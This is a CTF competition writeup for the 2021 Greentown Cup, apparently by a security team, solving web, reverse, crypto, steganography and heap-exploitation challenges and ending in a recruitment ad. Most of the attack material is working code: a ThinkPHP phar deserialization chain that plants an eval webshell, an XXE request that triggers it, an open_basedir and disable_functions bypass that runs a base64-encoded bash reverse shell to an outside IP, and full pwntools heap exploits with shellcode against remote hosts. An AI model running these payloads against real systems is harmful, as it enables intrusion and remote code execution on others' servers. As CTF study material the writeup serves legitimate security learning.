2021 绿城杯 (Greentown Cup) writeup

  • Web
    • ezcms
    • ezphp
  • Misc
    • [warmup] Audio steganography
  • Re
    • easyre
  • Crypto
    • RSA1
    • [warmup] Encryption algorithm
  • Pwn
    • null_pwn
    • uaf
    • GreentownNote
  • Tip

Web

ezcms

The gadget chain from the CISCN East-North China regional AWD.

<?php
namespace think\cache\driver {
    class File{
        protected $options=null;
        protected $tag;
        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9SRVFVRVNUWydzdWFudmUnXSk7Pz4g/../uploads/user/4/allimg/20210929/a.php',
                'data_compress' => false,
            ];
            $this->tag = 'suanve';
        }
    }
}
namespace think\session\driver{
    class SessionHandler{}
    class Memcached extends SessionHandler{
        protected $handler;
        protected $config = [];
        function __construct()
        {
            $this->config['session_name'] = 123;
            $this->config['expire'] = 123;
            $this->handler = new \think\cache\driver\File();
        }
    }
}
namespace think\console{
    class Output{
        protected $styles;
        private $handle;
        function __construct()
        {
            $this->styles = array('readAndWrite');
            $this->handle = new \think\session\driver\Memcached();
        }
    }
}
namespace think {
    class Process{
        private $processInformation;
        private $status;
        private $process;
        private $processPipes;
        function __construct()
        {
            $this->status = 'started';
            $this->processInformation= array("running"=>true);
            $this->processPipes = new console\Output();
            $this->process = 1;
        }
    }
}
namespace {
    use think\Process;
    // echo base64_encode(serialize(new Process()));
    @unlink("phar.phar");
    $phar = new Phar("phar.phar"); // the extension must be .phar
    $phar->startBuffering();
    $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
    $o = new Process();
    $phar->setMetadata($o); // store the custom meta-data in the manifest
    $phar->addFromString("test.txt", "test"); // add the file to be compressed
    // the signature is computed automatically
    $phar->stopBuffering();
    copy("./phar.phar","/Users/su/1.gif");
}

Generate the phar file. eyoucms does not validate files with the .ico extension, so renaming the phar to .ico lets it be uploaded, and the XXE then triggers the phar. An XXE fix turned up on Gitee, so this should be exploitable.

POST /index.php/home/Index/_initialize HTTP/1.1
Host: 0666787d-4b66-4e6e-8d13-55ab438b085f.zzctf.dasctf.com
Content-Type: text/xml; charset=utf-8
Cache-Control: max-age=0
Content-Length: 265

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929141155239.ico" >]>
<root>
<name>&xxe;</name>
</root>

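Added example (my own code, not from the original writeup): a small checker for the two artefacts this chain depends on, an XML body that declares an external entity pointing at a php://filter or phar:// stream wrapper, and an uploaded "image" that is really a phar archive (a phar stub always ends with __HALT_COMPILER();). The sample XML and the upload bytes are constructed here, and the indicator names are mine.

```python
import re

# Constructed samples (not from the writeup): a benign document and an
# XXE-style one whose SYSTEM entity wraps a phar path in php://filter.
BENIGN_XML = '<?xml version="1.0"?><root><name>alice</name></root>'
XXE_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE xxe [<!ELEMENT name ANY >'
    '<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/'
    'resource=phar:///var/www/html/uploads/user/4/allimg/x.ico" >]>'
    '<root><name>&xxe;</name></root>'
)

# Indicators from structural (any DOCTYPE in a request body) to
# payload-specific (PHP stream wrappers never belong in user XML).
XML_INDICATORS = {
    "doctype_present": re.compile(r"<!DOCTYPE", re.I),
    "external_entity": re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(r"<!ENTITY\s+%", re.I),
    "php_filter_wrapper": re.compile(r"php://filter", re.I),
    "phar_wrapper": re.compile(r"phar://", re.I),
}


def scan_xml_body(body: str) -> list:
    """Return the names of every indicator that matches the XML body."""
    return [name for name, rx in XML_INDICATORS.items() if rx.search(body)]


# Magic bytes an upload handler would accept as an image.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def phar_stub_present(data: bytes) -> bool:
    """True if the blob carries the token every phar stub must end with."""
    return b"__HALT_COMPILER" in data


def looks_like_phar_polyglot(data: bytes) -> bool:
    """True for a file that passes an image magic-bytes check but is a phar."""
    has_image_magic = any(data.startswith(m) for m in IMAGE_MAGIC)
    return has_image_magic and phar_stub_present(data)


# Constructed upload samples: a minimal GIF and a GIF-prefixed phar stub.
REAL_GIF = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00" * 16
FAKE_ICO = b"GIF89a<?php __HALT_COMPILER();?>" + b"\x00" * 8

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_XML), ("xxe", XXE_XML)):
        print(label, scan_xml_body(body))
    for label, blob in (("real gif", REAL_GIF), ("renamed phar", FAKE_ICO)):
        print(label, looks_like_phar_polyglot(blob))
```

The parser-side fix is to stop resolving external entities altogether (in PHP, never pass LIBXML_NOENT to the DOM or SimpleXML loaders, and on PHP before 8.0 call libxml_disable_entity_loader(true)); the upload-side fix is to validate the bytes of an uploaded icon rather than its extension, which is exactly the gap the writeup relies on.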

After getting a shell, restrictions turned up.

Bypass open_basedir.

Then use dl to bypass disable_functions and pop a reverse shell.

<?php
ini_set('open_basedir',dirname(__FILE__));
mkdir('tmp');
chdir('tmp');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
echo "fuck runing";
$cmd = '/readflag';
$cmd = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE2NS4xMTUvOTAxIDA+JjE=|base64 -d |bash";
$out_path = "/tmp/xxx";
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/exp.so";
putenv("LD_PRELOAD=" . $so_path);
mb_send_mail("", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
//var_dump(file_get_contents("/"));

Escalate privileges via PATH.

ezphp

Fetch the source with GitHack.

FLAG DASCTF{ca9efc658d3d96d7f2ccc81733bb4830}

Misc

[warmup] Audio steganography

Open the challenge file in Audacity, switch to the spectrogram view, and scroll to the end to see the flag.

Re

easyre

A 32-bit exe; opening it shows a modified RC4.

Writing a solver script directly is awkward, so brute-force the flag one character at a time instead; Python's os module can invoke the exe.

import os
# Output the binary prints when the input is wrong; any other output
# means the prefix tried so far is accepted.
b=['Hello, this is my world.If you want flag, give me something I like.\n', '\n', '\n', '\n',
"sorry!I don't like your stuff."]
flag=""
c=""          # characters recovered so far
for i in range(50):
    for j in range(32,127):
        flag=c
        flag+=chr(j)
        with open("tt.txt", "w") as f:
            f.write(flag)
        os.system("easy_re.exe <tt.txt> flag.txt")
        with open("flag.txt", "r") as a:
            data = a.readlines()
        #print(data)
        if(data!=b):
            print(chr(j))
            c+=chr(j)
            break

FLAG flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}

Crypto

RSA1

[warmup] Encryption algorithm

The encryption takes each letter's index in the alphabet, computes a new index as (index*a+b)%m, and uses that index to build the new string. All that is needed is the inverse operation.

from Crypto.Util.number import *
cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def decode(plain_text, a, b, m):
    flag = ''
    for j in plain_text:
        # search for the index i whose image under (i*a+b)%m is this character
        for i in range(len(str1)):
            if (i*a+b) % m == str1.find(j):
                flag += str1[i]
        # characters outside the alphabet pass through unchanged
        if j not in str1:
            flag += j
    print(flag)
decode(cipher_text,37,23,52)
# flag{AffInE_CIpheR_iS_clAssiC}
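As an added example (my code, not the writeup's), the closed-form inverse the text alludes to: instead of searching all 52 indices for every character, compute the modular inverse of a and apply p = (c - b) * a^-1 mod m. It also includes a small known-plaintext key search that assumes only that the flag begins with "flag"; pow(a, -1, m) needs Python 3.8 or newer.

```python
from math import gcd

# Alphabet used by the challenge: 26 lowercase then 26 uppercase letters, so m = 52.
ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'


def modinv(a: int, m: int) -> int:
    """Multiplicative inverse of a modulo m; only exists when gcd(a, m) == 1."""
    if gcd(a, m) != 1:
        raise ValueError(f"{a} has no inverse modulo {m}")
    return pow(a, -1, m)  # Python 3.8+


def affine_encrypt(plain: str, a: int, b: int, alphabet: str = ALPHABET) -> str:
    """c = (p*a + b) mod m per character; characters outside the alphabet pass through."""
    m = len(alphabet)
    out = []
    for ch in plain:
        idx = alphabet.find(ch)
        out.append(alphabet[(idx * a + b) % m] if idx != -1 else ch)
    return ''.join(out)


def affine_decrypt(cipher: str, a: int, b: int, alphabet: str = ALPHABET) -> str:
    """p = (c - b) * a^-1 mod m per character, using the modular inverse once."""
    m = len(alphabet)
    a_inv = modinv(a, m)
    out = []
    for ch in cipher:
        idx = alphabet.find(ch)
        out.append(alphabet[((idx - b) * a_inv) % m] if idx != -1 else ch)
    return ''.join(out)


def recover_key(known_plain: str, known_cipher: str, alphabet: str = ALPHABET) -> list:
    """Known-plaintext search: every (a, b) with gcd(a, m) == 1 that maps the
    known plaintext fragment onto the matching ciphertext fragment."""
    m = len(alphabet)
    return [(a, b)
            for a in range(1, m) if gcd(a, m) == 1
            for b in range(m)
            if affine_encrypt(known_plain, a, b, alphabet) == known_cipher]


if __name__ == "__main__":
    cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
    # Assume only the standard flag prefix; the first four characters fix the key.
    print(recover_key('flag', cipher_text[:4]))
    print(affine_decrypt(cipher_text, 37, 23))
```

With m = 52 the key space is only phi(52) * 52 = 24 * 52 = 1248 pairs, which is why a four-character crib already pins the key down to a single (a, b); a key with gcd(a, m) != 1 would not be invertible at all, and modinv refuses it rather than silently returning garbage.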

Pwn

null_pwn

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./null_pwn'
#context.arch='amd64'
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''telescope $rebase(0x202040) 16'''
    if len(sys.argv)==1 :
        # local run
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        # remote target
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('82.157.5.28',51704)
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    # menu helpers
    def choice(a):
        io.sendlineafter('Your choice :',str(a))
    def add(a,c,b):
        choice(1)
        io.sendlineafter('Index:',str(a))
        io.sendlineafter('Size of Heap : ',str(c))
        io.sendafter('Content?:',b)
    def edit(a,b):
        choice(3)
        io.sendlineafter('Index:',str(a))
        io.sendafter('Content?:',b)
    def show(a):
        choice(4)
        io.sendlineafter('Index :',str(a))
    def delete(a):
        choice(2)
        io.sendlineafter('Index:',str(a))
    add(0,0x88,'a')
    add(1,0x68,'a')
    add(2,0x68,'a')
    add(3,0x88,'a')
    add(4,0xf0,'a')
    add(5,0xf0,'a')
    delete(0)
    show(0)
    edit(3,'\x00'*0x80+p64(0x200)+'\x00')
    delete(4)
    delete(1)
    add(0,0xc8,'a'*8)
    show(0)
    # libc leak
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-840-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'\n')
    add(1,0x68,'a')
    add(3,0x68,'a')
    edit(3,'\x00'*0x13+p64(libc_base+one_gadgaet[2])+'\n')
    edit(0,'\x00'*0x88+p64(0x1000)+p64(libc.sym['__malloc_hook']-0x23)+'\n')
    delete(1)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb.attach(io,gdb_text)
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue

uaf

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./uaf_pwn'
#context.arch='amd64'
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''telescope $rebase(0x202040) 16'''
    if len(sys.argv)==1 :
        # local run
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        # remote target
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('82.157.5.28',50202)
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    # menu helpers
    def choice(a):
        io.sendlineafter('>',str(a))
    def add(c):
        choice(1)
        io.sendafter('size>',str(c))
    def edit(a,b):
        choice(3)
        io.sendlineafter('index>',str(a))
        io.sendafter('content>',b)
    def show(a):
        choice(4)
        io.sendlineafter('index>',str(a))
    def delete(a):
        choice(2)
        io.sendlineafter('index>',str(a))
    io.recvuntil('0x')
    heap_addr=int(io.recv(12),16)
    add(0x88)
    add(0x68)
    add(0x68)
    delete(0)
    show(0)
    # libc leak
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    delete(1)
    edit(1,p64(libc.sym['__malloc_hook']-0x23))
    add(0x68)
    add(0x68)
    edit(4,'\x00'*0x13+p64(one_gadgaet[2]+libc_base))
    delete(1)
    delete(1)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb.attach(io,gdb_text)
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue

GreentownNote

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./GreentownNote'
#context.arch='amd64'
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''telescope $rebase(0x202040) 16'''
    if len(sys.argv)==1 :
        # local run
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        # remote target
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('82.157.5.28',51701)
        clibc.srand(clibc.time(0))
        libc=ELF('./libc-2.27.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    # menu helpers
    def choice(a):
        io.sendlineafter('Your choice :',str(a))
    def add(b,c):
        choice(1)
        io.sendlineafter(':',str(b))
        io.sendafter(':',str(c))
    def show(a):
        choice(2)
        io.sendlineafter(':',str(a))
    def delete(a):
        choice(3)
        io.sendlineafter(':',str(a))
    add(0x88,'a')
    add(0x88,'a')
    for i in range(7):
        delete(1)
    delete(0)
    show(0)
    # libc leak
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    add(0x88,p64(free_hook_addr))
    add(0x88,p64(free_hook_addr))
    new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000
    shell1='''
    xor rdi,rdi
    mov rsi,%d
    mov rdx,0x1000
    xor rax,rax
    syscall
    jmp rsi
    '''%new_shell_code_head_addr
    pay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1)
    add(0x88,pay)
    srop_mprotect=SigreturnFrame()
    srop_mprotect.rsp=free_hook_addr+0x8
    srop_mprotect.rdi=new_shell_code_head_addr
    srop_mprotect.rsi=0x1000
    srop_mprotect.rdx=4|2|1
    srop_mprotect.rip=libc.sym['mprotect']
    add(0x200,str(srop_mprotect))
    # gdb.attach(io,gdb_text)
    delete(3)
    shell2='''
    mov rax,0x67616c662f2e
    push rax
    mov rdi,rsp
    mov rsi,0x0
    xor rdx,rdx
    mov rax,0x2
    syscall
    mov rdi,rax
    mov rsi,rsp
    mov rdx,0x100
    mov rax,0x0
    syscall
    mov rdi,0x1
    mov rsi,rsp
    mov rdx,0x100
    mov rax,0x1
    syscall
    '''
    io.sendline(asm(shell2))
    # success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb.attach(io,gdb_text)
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue

Tip

Do you want to join a security team

and have a better place to learn?

Then join EDI Security. It does not matter if you are new; the seniors understand, and they can take you from the basics, as long as you have the determination to keep working hard.

EDI Security's CTF team regularly takes part in CTF competitions and keeps up with the CTF scene, working to build a good technical community of our own in the security circle; this is definitely a good place to learn. It lets you start from the basics together with others, and as long as you have the determination to persevere, the next CTF master will be you.

Experts and beginners alike are welcome; let's play CTF and improve together.

With us, you will not be buried.

Your joining brings us new energy, and we in turn can give you unlimited room to grow.

If you are interested, please contact root@edisec.net with your résumé, including your studies, learning direction, and so on.
